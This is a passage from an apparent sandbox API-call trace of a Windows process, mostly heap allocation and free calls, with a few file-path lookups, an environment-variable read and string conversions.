| out: hHeap=0x2af0000) returned 1 [0111.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0111.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0111.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0111.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0111.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0111.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0111.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0111.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0111.997] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71e88 [0111.997] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70c0 [0111.997] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0111.997] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x2a753a8 [0111.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa6568 | out: hHeap=0x2af0000) returned 1 [0111.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0111.997] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71f88 [0111.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0111.997] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0111.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0111.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70c0 | out: hHeap=0x2af0000) returned 1 [0111.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e88 | out: hHeap=0x2af0000) returned 1 [0111.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0111.997] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0111.997] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71e88 [0111.997] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0111.998] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0111.998] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71f88 [0111.998] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0111.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0111.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0111.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0111.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0111.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e88 | out: hHeap=0x2af0000) returned 1 [0111.998] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4e) returned 0x29eb268 [0111.998] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/ZvWDNly8ss.csv", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\ZvWDNly8ss.csv", lpFilePart=0x8cf650*="ZvWDNly8ss.csv") returned 0x26 [0111.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eb268 | out: hHeap=0x2af0000) returned 1 [0111.998] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\ZvWDNly8ss.csv" (normalized: "c:\\users\\fd1hvy\\desktop\\zvwdnly8ss.csv")) returned 0xffffffff [0111.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a753a8 | out: hHeap=0x2af0000) returned 1 [0111.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71de8 | out: hHeap=0x2af0000) returned 1 [0111.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0111.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0111.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0111.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0111.998] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0111.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec40 | out: hHeap=0x2af0000) returned 1 [0111.998] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0111.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ea40 | out: hHeap=0x2af0000) returned 1 [0111.998] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0111.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec80 | out: hHeap=0x2af0000) returned 1 [0111.998] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0111.998] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71f88 [0111.998] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0111.998] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71e88 [0111.998] CharUpperBuffW (in: lpsz="A5700E02918", cchLength=0xb | out: lpsz="A5700E02918") returned 0xb [0111.999] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d78 | out: hHeap=0x2af0000) returned 1 [0111.999] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e88 | out: hHeap=0x2af0000) returned 1 [0111.999] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0111.999] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71db8 [0111.999] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0111.999] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0111.999] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71e88 [0111.999] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0111.999] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0111.999] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71de8 [0111.999] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0111.999] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71de8 | out: hHeap=0x2af0000) returned 1 [0111.999] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a68440 [0111.999] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ec8 [0111.999] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0111.999] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0111.999] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0111.999] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9250 [0111.999] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0111.999] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0111.999] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa90e8 [0111.999] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71de8 [0111.999] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf2b8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0111.999] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0111.999] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0111.999] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ea8 [0111.999] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71de8 | out: hHeap=0x2af0000) returned 1 [0111.999] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0111.999] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0112.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0112.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0112.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0112.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0112.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0112.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0112.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0112.000] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71de8 [0112.000] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7080 [0112.000] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0112.000] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x80) returned 0x2a68440 [0112.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e68 | out: hHeap=0x2af0000) returned 1 [0112.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0112.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7080 | out: hHeap=0x2af0000) returned 1 [0112.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71de8 | out: hHeap=0x2af0000) returned 1 [0112.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e88 | out: hHeap=0x2af0000) returned 1 [0112.000] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71de8 [0112.000] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0112.000] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71eb8 [0112.000] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0112.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71eb8 | out: hHeap=0x2af0000) returned 1 [0112.000] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71e88 [0112.000] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0112.000] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71eb8 [0112.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71eb8 | out: hHeap=0x2af0000) returned 1 [0112.000] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9220 [0112.000] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f08 [0112.000] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0112.000] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71eb8 [0112.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0112.001] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0112.001] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0112.001] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0112.001] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0112.001] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0112.001] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ec8 [0112.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0112.001] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0112.001] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0112.001] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0112.001] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0112.001] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0112.001] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71fe8 [0112.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9040 | out: hHeap=0x2af0000) returned 1 [0112.001] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0112.001] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0112.001] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0112.001] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0112.001] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72028 [0112.001] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a720d8 [0112.001] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0112.001] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0112.001] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72088 [0112.001] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0112.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72088 | out: hHeap=0x2af0000) returned 1 [0112.001] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72088 [0112.001] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0112.001] CharUpperBuffW (in: lpsz="SSA5700E02918", cchLength=0xd | out: lpsz="SSA5700E02918") returned 0xd [0112.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c60 | out: hHeap=0x2af0000) returned 1 [0112.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72088 | out: hHeap=0x2af0000) returned 1 [0112.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0112.002] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0112.002] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0112.002] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720d8 | out: hHeap=0x2af0000) returned 1 [0112.002] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72028 | out: hHeap=0x2af0000) returned 1 [0112.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0112.002] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0112.002] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0112.002] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0112.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0112.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72028 [0112.002] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0112.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0112.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0112.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0112.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72088 [0112.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0112.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0112.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72098 [0112.002] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0112.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0112.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0112.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0112.002] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0112.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0112.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95e0 [0112.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a720d8 [0112.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f30 [0112.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0112.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a720e8 [0112.003] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0112.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0112.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0112.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0112.003] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0112.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0112.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0112.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0112.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0112.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0112.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0112.003] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0112.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0112.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0112.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0112.003] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0112.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0112.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0112.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0112.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0112.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0112.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0112.003] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0112.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0112.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0112.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0112.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0112.003] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0112.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0112.003] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0112.003] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0112.003] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0112.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0112.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0112.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b70 | out: hHeap=0x2af0000) returned 1 [0112.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72028 | out: hHeap=0x2af0000) returned 1 [0112.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0112.004] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0112.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72028 [0112.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0112.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0112.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0112.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0112.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0112.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0112.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0112.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9808 [0112.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0112.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0112.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0112.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9778 [0112.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0112.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9718 [0112.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72778 [0112.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96a0 [0112.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a726a8 [0112.005] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[\\\\/]+\\z", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0112.006] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x9) returned 0x2aa9688 [0112.006] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[\\\\/]+\\z", cchWideChar=9, lpMultiByteStr=0x2aa9688, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[\\\\/]+\\z", lpUsedDefaultChar=0x0) returned 9 